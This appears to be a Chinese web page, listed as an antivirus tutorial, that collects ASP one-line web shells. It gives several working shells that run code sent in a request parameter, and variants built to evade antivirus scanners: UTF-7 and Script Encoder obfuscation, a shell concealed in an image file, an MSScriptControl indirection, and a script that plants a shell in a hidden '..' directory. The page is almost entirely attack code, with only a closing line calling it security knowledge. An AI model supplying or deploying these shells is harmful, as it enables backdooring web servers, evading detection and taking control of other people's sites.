首页/杀毒教程/内容

一句话木马的局部整理

杀毒教程2023-08-29 阅读()
[摘要]<%execute request("#")%><%execute request(chr(35))%><script language=VBScr...

<%execute request("#")%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>"""" then

ExecuteGlobal request(chr(35))

</script>

<%ExecuteGlobal request(chr(35))%>

<%eval request("#")%>

以上都是正常的SHELL, 下面几个是变形, 或者是用来免杀的

数据库里插入

┼攠數畣整爠煥敵瑳∨∣┩愾

utf-7的马

<%@ codepage=65000%>

<% response.Charset="936"%>

<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的

要绕过lake2的话, 用几个变量加常量的方法定义图片名再包含就可以了

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")

ms.Language="VBScript"

ms.AddObject "Response", Response

ms.AddObject "request", request

ms.AddObject "session", session

ms.AddObject "server", server

ms.AddObject "application", application

ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

Script Encoder 加密

<%@ LANGUAGE = VBScript.Encode %>

<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

另外还一个另类的, 利用windows的目录漏洞,建立..\目录里面放一句话,

Set fso=Server.CreateObject("Scripting.FileSystemObject")

path=server.mappath("/")

Set f = fso.CreateFolder(path&"\index..\")

Set a = fso.CreateTextFile(path&"\index..\1.asp", True)

a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"

a.WriteLine"response.clear"

a.WriteLine"Execute request(chr(35))"

a.WriteLine"response.end"

a.WriteLine"end if"

a.WriteLine"</script>"

一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。



……

相关阅读